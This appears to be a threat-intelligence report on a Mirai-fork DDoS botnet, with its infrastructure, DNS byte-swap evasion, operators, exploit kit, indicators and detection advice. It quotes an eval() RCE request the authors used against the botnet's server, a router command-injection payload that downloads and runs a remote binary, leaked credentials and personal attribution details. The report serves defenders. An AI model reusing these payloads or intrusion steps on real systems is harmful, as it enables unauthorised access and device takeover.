SenNight Unmasked: Full Server Compromise of a Mirai-Fork Botnet Reveals DNS Byte-Swap Anti-Analysis, Operator Succession Chain, and 30Gbps DDoS Infrastructure

Published: 2026-03-08 | TLP:WHITE | Breakglass Intelligence

TL;DR

An eval() injection in a Flask-based DDoS panel gave us root-level RCE on the SenNight botnet's primary C2 server, yielding 850KB+ of exfiltrated source code, credentials, databases, and operational logs. The operator -- a Chinese-speaking actor using the handle angelalk21 (QQ: 597118859, Telegram: @Kuru_x86) -- runs a Mirai-fork botnet with a novel DNS byte-swap anti-analysis technique that causes passive DNS researchers to track decoy IPs in Japan and the US while the real C2 sits in Germany. The infrastructure spans three servers across Germany, the Netherlands, and Hong Kong with 30Gbps DNS amplification capacity, and has passed through at least three operators since December 2024.

---

The Entry Point: Python's eval() Strikes Again

The SenNight botnet (森狞僵尸网络 -- "Forest Fierce Zombie Network") ran a Flask-based attack panel on port 5000. The panel's POST /attack endpoint redirects to /?result={dict}, where the result query parameter is fed directly into Python's eval():

# panel.py line 179
result=eval(result) if result else None  # "简易反序列化" (simple deserialization)

The developer's comment -- "simple deserialization" -- understates the problem. The auth check gates the POST, but the GET parameter runs unauthenticated. Exploitation was trivial:

GET /?result={'s':True,'m':__import__('os').popen('id').read()}

Response: uid=0(root) gid=0(root) groups=0(root)

Time-based confirmation ruled out false positives: sleep(3) yielded 3.192s (baseline 0.191s), sleep(5) yielded 5.213s. We had root on the C2.

Before finding this vulnerability, we had burned through 477+ Flask session cookie forgeries (53 secret keys x 9 payloads), 42 IP whitelist bypass headers, HTTP request smuggling variants, Werkzeug debug PIN brute-force, 93 username timing enumerations on port 1337, 400+ credential combinations across multiple ports, and 57 Mirai default credentials. The eval() was hiding in plain sight.

Data exfiltration used the Apache webroot on port 80 -- write command output to /var/www/html/, retrieve via HTTP GET.

---

Infrastructure Anatomy

Three-Server Architecture

The SenNight operation runs across three geographically distributed servers with distinct roles:

Server	Location	Role	Ports	Status (Mar 7)
94.26.106.137	DE (dataforest GmbH / vmheaven.io)	Primary CNC, bridge, bot C2, panel	22, 80, 1337, 2323, 5000, 23004, 48101	OFFLINE
185.198.234.96	NL (moula-world-llc)	Backend API, Flask panel mirror, bot listeners	22, 2222, 5000, 5555, 8001, 8080, 8085, 8443	LIVE
103.43.8.226	HK (I LAYER LIMITED)	DNS amplification DDoS API	8088	LIVE

The primary C2 hosted the operator-facing CNC console (port 1337) with a bilingual Chinese/English interface, a bot authentication bridge (port 2323) compiled from swap.c with libssh, the vulnerable Flask panel, and the actual bot command channel on port 23004. A Go-based SSH forwarder on port 48101 used ML-KEM-768 post-quantum key exchange for encrypted C2 tunneling.

The backend at 185.198.234.96 runs a Go HTTP server on port 8085 serving attack dispatch via a single GET endpoint:

GET /api/attack?username=asd30&password=asd300&target=<IP>&method=<method>&port=<port>&time=<seconds>&len=<size>

Available methods: stomp, udp, tcpack, junk, greip (standard tier); vse, icmp (gated behind higher privileges). User enumeration confirmed accounts admin, asd30, and asd50.

The DDoS API at 103.43.8.226:8088 provides the real firepower: three dedicated 10Gbps servers ("独立10G口" -- dedicated 10G ports) running DNS amplification attacks, with a 100-slot queue and 3 concurrent attack capacity. Two of three servers were online at time of investigation, giving 20Gbps active capacity.

The Hosting Stack

The primary C2's hosting chain is notable: AS48452 (traffic broadband communications ltd., Bulgaria) / AS215607 (dataforest GmbH, Frankfurt), with the VM provided by vmheaven.io -- a brand of 1337 Services LLC, registered in Saint Kitts and Nevis. The same entity operates mirailovers.io, which hosts the cross-compiler archive that angela used to build bot binaries for 13 architectures. The sister entity x1337.cc (1337 Services GmbH / X1337 CC Group AB, Sweden) openly sells "Spoofed Dedicated Servers" with IP spoofing for DDoS amplification.

---

The DNS Byte-Swap: A Novel Anti-Analysis Technique

This is the most technically interesting finding. All bot C2 domains resolve to byte-swapped IP addresses. The bot binary's resolve.c contains a custom XOR swap that reverses octets 0 and 2, then 1 and 3, after DNS resolution:

// resolve.c lines 338-345
tmp_buf[0] = name[0] ^ name[2];
tmp_buf[2] = name[2] ^ tmp_buf[0];
tmp_buf[0] = tmp_buf[0] ^ tmp_buf[2];
//you are blacker than you are gay
tmp_buf[1] = name[1] ^ name[3];
tmp_buf[3] = name[3] ^ tmp_buf[1];
tmp_buf[1] = tmp_buf[1] ^ tmp_buf[3];

The comment between the swap operations is the developer's original (left verbatim for forensic completeness).

The effect:

Domain	DNS Returns	Bot Connects To	Decoy Owner
hikivision.osfc.org.cn	106.137.94.26	94.26.106.137 (real C2)	KDDI, Japan
angelawashere.duckdns.org	106.137.94.26	94.26.106.137 (real C2)	KDDI, Japan
totolink.osfc.org.cn	38.87.212.135	212.135.38.87 (real staging)	Cogent, US
realtek.osfc.org.cn	106.137.94.26	94.26.106.137 (real C2)	KDDI, Japan

Any analyst doing passive DNS analysis, querying VirusTotal, or running automated IOC enrichment will attribute the C2 to an innocent KDDI IP in Japan. Only dynamic analysis of the bot binary -- or reading the source code, as we did -- reveals the real infrastructure. This technique is simple (a four-line XOR swap) but effective against the majority of automated threat intelligence pipelines that rely on passive DNS.

The domain choices are also deliberate: hikivision (typosquat of Hikvision), totolink and realtek (IoT vendor names) all sit under .osfc.org.cn, a Chinese TLD. The angelawashere.duckdns.org fallback uses free dynamic DNS. The operator's personal domain angelas.work.gd (DNSExit) pointed directly to the real C2 without byte-swapping -- an OPSEC inconsistency.

---

The Succubus Platform: DDoS-as-a-Service

The CNC runs Succubus, a commercial Mirai management framework with features well beyond a basic Mirai fork:

• Shop system: Credit-based purchasing for roles, concurrent attack slots, time limits, and expiry extensions
• Multi-protocol: Mirai botnet (port 818), QBot protocol (port 181), dedicated API servers
• Discord/Telegram integration: Webhook logging and channel monitoring (currently disabled with placeholder tokens)
• Web dashboard: Full HTML/JS panel using the Black Dashboard template
• Fake bot count: Configured to display 19,367--22,569 bots. The real count is ~237 live bots, with 2,721 historically enrolled IPs. A 100x inflation.
• Target whitelist: *.gov domains blocked; DDoS stats servers 103.217.189.43 and 111.170.155.199 whitelisted
• Custom theme: Prompt @「風止意難平」 (Traditional Chinese: "The wind stops but feelings remain unsettled"), alternate theme @airashi~# (airashi = 嵐 = storm, Japanese)

MariaDB: 8 Operators, 200 Attacks

The MariaDB instance (password: Oscar20100319 -- pattern suggests a prior operator born 2010-03-19) yielded the succubus database with full operator records:

Username	Password	Login IP	Timezone	Role
root	252100	154.89.0.46	Asia/Hong_Kong	admin+reseller+vip
angela	252100	127.0.0.1	Asia/Hong_Kong	admin+reseller+vip (1M concurrent)
taizi	taizi666	199.48.247.167	Asia/Hong_Kong	reseller
ss686868	ss686868	171.97.52.80	Asia/Bangkok	vip
admin2	liesha123	114.24.241.146	Asia/Taipei	reseller
hatol	hatol123	46.210.221.18	Asia/Jerusalem	admin+reseller+vip
guaikadmin	guaikadmin	220.197.230.192	Asia/Shanghai	reseller
junzhu	junzhu123	103.207.69.44	Asia/Hong_Kong	reseller
botnetadmin	114514qQ@@	(never logged in)	--	admin (disabled)

All passwords stored as hex-encoded plaintext. The Asia/Hong_Kong, Asia/Bangkok, Asia/Taipei, Asia/Shanghai, and Asia/Jerusalem timezones indicate a pan-Asian customer base with at least one Middle Eastern operator.

The attacks table contained 200 recorded DDoS attacks spanning January 2025 through March 2026, targeting gaming servers (Valve Source Engine on ports 27015/27020), Chinese cloud infrastructure (Tencent, Alibaba), Vietnamese ISPs, Israeli hosting, and AWS instances.

---

Operator Succession: Three Hands on One Botnet

The CNC's operational logs reveal the complete ownership chain:

Period	Operator	Key Activity
Dec 25, 2024	Server provisioned	wtmp begins
Feb 2025	brianshaw	Initial setup, 195 attacks, first users created
Mar--Jun 2025	brianshaw + cold	Peak operations: 20+ users, kick wars with rienig (1,235 attacks)
Jun 2025	xin	Takeover from brianshaw, creates admin3/rienig/blackest/kral
Jan 25, 2026	angela takes over	First attack, creates users dopt, ye, guaika
Feb 28, 2026	angela rebuilds	Purges old users, deploys CNC/bridge/scanner, new backend
Mar 2, 2026	angela deploys panel	Flask panel started, universal password set to 252100
Mar 6, 2026	angela's last session	Login from Vultr VPS 45.77.86.228, ends 13:10 UTC
Mar 6, 2026	Server compromised	Our RCE via eval(), 3+ hours after angela's last session
Mar 7, 2026	Primary C2 offline	All ports filtered; backend remains live

How angela Took Over

The takeover was methodical:

1. DNS byte-swap in resolve.c -- Old bots compiled without the swap connect to the decoy IPs and die off. Only angela's recompiled bots reach the real C2. This is a cryptographic shibboleth: the swap function serves as a botnet access control mechanism.
2. Universal password 252100 stamped on every service: SSH, CNC, bridge, MariaDB angela user.
3. Defacement signatures in the domains configuration: angeladoesnotlikepeoplepeekingathisbin, angelabotloaded, angelawashere.duckdns.org.
4. Deliberate sabotage of the Flask panel -- The panel sends username=as30 instead of asd30, causing all web-panel-proxied attacks to silently fail against the backend API. This breaks the service for anyone using the old interface.
5. Attacks toggled OFF in CNC -- Why run a commercial DDoS service with attacks disabled? Because angela is rebuilding.

---

Threat Actor Profile: angelalk21 / 王从天降

Identity Indicators

Attribute	Value	Confidence
Primary handle	angelalk21	HIGH -- SSH username to backend
Chinese handle	王从天降 (wangcongtianjiang)	HIGH -- own DNS subdomain
Meaning	"Wang descended from heaven"	Pinyin decode
QQ number	597118859	HIGH -- FOFA registration
QQ email	597118859@qq.com	HIGH -- in FOFA API script
FOFA API key	5dc4070c9dcd7eab52846d3a7922e0e4	HIGH -- from source
Telegram	@Kuru_x86	HIGH -- channel exists, 3 subscribers, display name "nn"
Universal password	252100	HIGH -- SSH, CNC, bridge, MariaDB
Language	Chinese Mandarin	HIGH -- all tools, comments, UI in zh-CN
Western alias	"kieran ellison"	LOW -- in CNC branding, likely predecessor

Geographic Attribution

IP	Provider	Assessment
39.144.238.147	China Mobile	REAL ORIGIN -- residential mobile, strongest geographic indicator
103.175.14.11/12	Zero Cirrus Cloud, Shanghai	Chinese VPS hop, same /24
154.89.0.46/50	Aisanie Data, HK / Larus	VPN/proxy
154.86.9.148	Cloud Innovation / Larus, NL	VPN/proxy
185.23.182.161	European VPN	VPN
45.77.86.228	Vultr (The Constant Company)	Operator VPS

China Mobile (39.144.238.147) is a consumer/residential provider. Combined with the Shanghai cloud VPS as a hop, this places the operator in mainland China. The QQ number in the 597M range was registered approximately 2009--2010, and all tooling, comments, and UI are in Simplified Chinese.

FOFA Reconnaissance

The operator uses FOFA (fofa.info, a Chinese Shodan equivalent) for target discovery, querying by icon hash to find vulnerable IoT devices and piping results through exploit scripts. The FOFA account is registered to QQ 597118859 -- the strongest identity pivot for further attribution.

---

Exploit Arsenal

The C2 server contained a complete offensive toolkit spanning router exploits, DVR compromises, and mass loading infrastructure:

CVE-2026-24061 -- GNU InetUtils telnetd Auth Bypass

# cve.py -- Exploits NEW_ENVIRON telnet option
# Sends USER="-f root" to bypass authentication
# Post-exploitation: kills competing botnet "kworker_ds"

After gaining root, the exploit:

• Stops kworker_ds systemd service
• Removes all crontabs
• Cleans temp directories
• Blocks competitor IPs 204.10.161.71 and 204.10.161.82 via iptables
• Reboots the device

Teltonika Router 0-Day

Command injection via /cgi-bin/hotspotlogin.cgi in the uamip parameter:

send=1&uamip="; cd /tmp;rm -rf *;wget http://151.243.213.58/a/sys64.mips;chmod 777 sys64.mips;./sys64.mips angela.telkonika #

Bot tag angela.telkonika identifies devices enrolled through this vector. The exploit runs with 1,000 concurrent threads.

Additional Exploit Tooling

Tool	Target	Language	Notes
mpsl.go	LBLink routers (port 8080)	Go	Active scanning against Ukrainian IPs
raisecom.py	Raisecom network equipment	Python	VPN config endpoint exploitation
qinglong.py	Qinglong automation framework	Python	PUT to /aPi/system/command-run
tvt.go	TVT DVR devices	Go	Zone files for US/GB/IL/CA/MX/TW
zte.go	ZTE routers (ports 80/8083)	Go	Router exploitation
load.go / load2.go	SSH brute-force	Go	300K goroutines, staging via 212.135.38.87
kdvr.py	KDVR DVR devices	Python	DVR exploitation
1.py	Hikvision/DVR API	Python	Mass RCE via /aPi/system/command-run

The operator downloads country-specific IP zone files (IL, US, UK, TW, MX, CA, HK) and feeds them through zmap scanning pipelines: zmap -p 8080 -w <country>.zone | go run mpsl.go 8080.

---

Bot Malware: Modified Mirai with RC4 Anti-Analysis

Bot Source Code (33 files)

The complete bot source was extracted from /root/bot/. Key behaviors:

• Connects to C2 on port 23004 via DNS resolution (with byte-swap)
• Sends RC4-encrypted auth token + architecture + root status
• Self-deletes binary on execution (unlink(argv[0]))
• Ignores all 64 signals, forks to background, closes stdio
• 7-day inactivity timeout before self-termination
• Process killer enumerates /proc/*/maps and stdin to detect competing malware
• #ifdef HIK variant: Hikvision-specific cleanup routines
• #ifdef ASUS variant: skips fork for ASUS router persistence
• Build flags: -DKILLER -DLOCKER -DFLOODS
• 13 target architectures: armv4l, armv5l, armv6l, armv7l, i586, i686, x86_64, mips, mipsel, m68k, powerpc, sh4, sparc

Modified RC4 Encryption (enc.c)

The CNC encryption module is a heavily modified RC4 implementation designed to frustrate reverse engineering:

• 96-byte key assembled from 6x 16-byte segments with XOR pointer obfuscation (^ 0x12345678)
• Two dummy KSA passes with 256-byte decoy keys (designed to waste analyst time)
• Modified PRGA: step size 17 (not standard 1), bit rotations (ROL3/ROL5/ROL2/ROL6), AES GF(2^8) MixColumns operations every 2nd byte
• Deterministic offsets: seeded from srand(key[0] + key[last] + len)
• Dead code injection: unused confusion loops for anti-analysis

DLR Dropper

The dropper (/root/dlr/main.c) is a minimal loader using raw syscalls with no libc dependency:

// Downloads from 212.135.38.87:80 at /bins/jew.<arch>
// Saves as "kurc", chmod 777, executes
// Status messages: "JELEAD\n" (exec), "HUHNO\n" (download complete), "YAR\n" (connect failure)
// Entry point: __start (no C runtime)

Attack Methods

The bot supports 8 DDoS methods: udp, syn, psh-ack, icmp, tcpbypass, udpbypass, ack. The panel adds stomp, tcpack, junk, greip. All methods route through the dedicated DDoS API at 103.43.8.226:8088 for DNS amplification.

---

Post-Compromise: Why the Primary C2 Died

On March 7, 2026 -- the day after our exploitation -- the primary C2 at 94.26.106.137 went completely dark. All ports filtered. Our assessment: hosting provider suspension, not operator response.

Evidence that angela did not detect the intrusion:

• No SSH reconnection after 13:10 UTC on March 6 (our exploit ran at ~16:30)
• No password changes anywhere
• No firewall rules deployed (iptables completely empty)
• No log clearing
• Backend credentials asd30/asd300 remained valid and unchanged
• All alerting (Discord, Telegram, webhooks) disabled with placeholder tokens
• No IDS, no file integrity monitoring, no cron-based alerts

The server had 40 AlienVault OTX pulses tagging it as a malware host with an open directory. It was serving bot binaries openly via Apache on port 80 at URLs like /angela686, /angelampsl, /angelahik, /angelaarm6, /dlr.arm5, /angelash4. The hosting provider likely acted on accumulated abuse reports, not anything related to our activity.

Current State: Fragmented but Alive

The backend at 185.198.234.96 remains fully operational with all 8 ports open. The DDoS API at 103.43.8.226:8088 is live (though the API key has been rotated). But the bot domains still resolve to byte-swapped IPs of the dead primary C2:

hikivision.osfc.org.cn    → 106.137.94.26 (swaps to dead 94.26.106.137)
angelawashere.duckdns.org → 106.137.94.26
realtek.osfc.org.cn       → 106.137.94.26
totolink.osfc.org.cn      → 38.87.212.135 (swaps to dead staging)
angelas.work.gd           → NXDOMAIN

The botnet is fragmented. The ~237 live bots cannot phone home until angela updates the DNS records. The backend infrastructure is waiting for bots that will never arrive. When angela discovers the primary C2 is down, she will need to update the DNS to point to 185.198.234.96 (byte-swapped) to reconnect her fleet -- and that DNS change will be visible to anyone monitoring these domains.

---

MITRE ATT&CK Mapping

Tactic	ID	Technique	Implementation
Initial Access	T1190	Exploit Public-Facing Application	CVE-2026-24061 telnetd bypass, Teltonika 0-day CGI injection, LBLink router exploit
Execution	T1059.004	Unix Shell	Shell commands via telnet/CGI injection, raw syscall dropper
Persistence	T1053.003	Crontab	Crontab manipulation on compromised devices
Defense Evasion	T1070.004	File Deletion	History clearing, competitor malware removal, unlink(argv[0])
Defense Evasion	T1027	Obfuscated Files	DNS byte-swap, modified RC4, dead code injection, dummy KSA passes
Discovery	T1046	Network Service Discovery	zmap port scanning of country-specific IP ranges
Discovery	T1596	Search Open Technical Databases	FOFA icon hash reconnaissance
Lateral Movement	T1021.004	SSH	300K-goroutine SSH brute-force loader
Collection	T1005	Data from Local System	Device compromise for botnet enrollment
Command and Control	T1095	Non-Application Layer Protocol	Custom CNC protocol (ports 1337/23004)
Command and Control	T1572	Protocol Tunneling	Go SSH forwarder with ML-KEM-768 post-quantum KX
Command and Control	T1568.002	Domain Generation / Resolution	DNS byte-swap to obfuscate real C2 IP
Impact	T1498.001	Direct Network Flood	UDP, SYN, ACK, PSH-ACK, ICMP floods
Impact	T1498.002	Reflection Amplification	DNS amplification via dedicated 10Gbps servers

---

Indicators of Compromise

Active Infrastructure

185.198.234.96        Backend API / Flask panel / Bot C2 (8 ports live)
                      Hosting: moula-world-llc, NL (via InterlIR / RCS Technologies AE)
                      Ports: 22, 2222, 5000, 5555, 8001, 8080, 8085, 8443

103.43.8.226          DDoS amplification API (port 8088)
                      Hosting: I LAYER LIMITED, HK
                      Capacity: 3x 10Gbps DNS amplification servers

Offline Infrastructure (was active)

94.26.106.137         Primary CNC (all ports filtered since Mar 7)
                      Hosting: dataforest GmbH, DE / vmheaven.io (1337 Services LLC)

212.135.38.87         DLR dropper staging (/bins/jew.<arch>)
151.243.213.58        Teltonika exploit staging (/a/sys64.mips)
107.150.0.18          SSH payload staging
213.209.143.44        TFTP payload staging
204.10.161.82         Panel template source

Operator Infrastructure

45.77.86.228          Vultr VPS (operator session)
39.144.238.147        China Mobile (operator residential IP)
103.175.14.11/12      Zero Cirrus Cloud, Shanghai (hop VPS)
154.89.0.46/50        Aisanie Data, HK / Larus (VPN/proxy)
154.86.9.148          Cloud Innovation / Larus, NL (VPN/proxy)
185.23.182.161        European VPN

Domains

hikivision.osfc.org.cn      → 106.137.94.26 (byte-swapped → 94.26.106.137)
angelawashere.duckdns.org   → 106.137.94.26 (byte-swapped → 94.26.106.137)
totolink.osfc.org.cn        → 38.87.212.135 (byte-swapped → 212.135.38.87)
realtek.osfc.org.cn         → 106.137.94.26 (byte-swapped → 94.26.106.137)
angelas.work.gd             → 94.26.106.137 (direct, NXDOMAIN as of Mar 7)
aethercraft.cc              → Not resolving (registered Feb 19 via west.cn, Chengdu)

Credentials (for detection/hunting)

Flask/Backend API:  asd30 / asd300
CNC admin:          angela / 252100
CNC users:          ye / ye123, daimao / daimao123
Bridge:             admin / 252100, liesha / liesha123, luren / luren123
SSH root:           root / 252100
MariaDB:            root / Oscar20100319
FOFA:               597118859@qq.com / key:5dc4070c9dcd7eab52846d3a7922e0e4
Flask secret:       a2f987b4c0d7e1f3e4a5b6c7d8e9f0a1b

Network Signatures

Port 1337 banner:       "username / 用户名 : "
Port 2323 banner:       "Username: "
DLR status messages:    "JELEAD\n" (exec), "HUHNO\n" (download), "YAR\n" (connect fail)
DLR download path:      /bins/jew.<arch>
Bot tag format:         angela.<exploit_name>
Teltonika payload URI:  /cgi-bin/hotspotlogin.cgi (uamip param injection)
Qinglong payload URI:   /aPi/system/command-run (PUT)
Bot C2 port:            23004

Attribution Pivots

QQ:                 597118859
Telegram:           @Kuru_x86 (channel, 3 subscribers, display name "nn")
SSH handle:         angelalk21
Chinese handle:     王从天降 (wangcongtianjiang, "Wang descended from heaven")
Origin:             Mainland China (China Mobile 39.144.238.147)
FOFA account:       597118859@qq.com

AlienVault OTX URLs (Primary C2)

http://94.26.106.137/angela686
http://94.26.106.137/angelampsl
http://94.26.106.137/angelam68k
http://94.26.106.137/angelaspc
http://94.26.106.137/angelahik
http://94.26.106.137/angelaarm6
http://94.26.106.137/angelash4
http://94.26.106.137/dlr.arm5
http://94.26.106.137/dbg

Shodan Tags (Primary C2)

{
  "ip": "94.26.106.137",
  "ports": [22, 80, 1337, 9999],
  "tags": ["open-dir", "scanner"],
  "cpes": [
    "cpe:/a:apache:http_server:2.4.58",
    "cpe:/a:openbsd:openssh:9.6p1",
    "cpe:/o:canonical:ubuntu_linux"
  ]
}

---

Detection Guidance

For network defenders:

• Monitor for DNS queries to hikivision.osfc.org.cn, angelawashere.duckdns.org, totolink.osfc.org.cn, realtek.osfc.org.cn -- any device resolving these is likely infected
• Watch for outbound connections to port 23004 (bot C2 channel)
• The DLR dropper downloads from /bins/jew.<arch> -- this URI path is a reliable signature
• Bot binaries self-delete but the process name may appear in /proc before cleanup

For threat intelligence teams:

• The DNS byte-swap technique will cause false negatives in passive DNS enrichment -- if you see 106.137.94.26 associated with Mirai activity, the real C2 is 94.26.106.137
• QQ 597118859 and Telegram @Kuru_x86 are the strongest attribution pivots
• Monitor aethercraft.cc (registered Feb 19, 2026 via west.cn) -- likely angela's next infrastructure domain

For ISPs/hosting providers:

• 185.198.234.96 at moula-world-llc (NL) is actively dispatching DDoS attacks
• 103.43.8.226 at I LAYER LIMITED (HK) provides 20Gbps DNS amplification capacity
• DuckDNS should be notified about angelawashere.duckdns.org for botnet C2 use
• osfc.org.cn subdomains (hikivision/totolink/realtek) should be reported to the registrar (Alibaba/HiChina)

---

Investigation conducted March 6--8, 2026. Monitoring ongoing. Updates will be published if angela reconnects or rebuilds.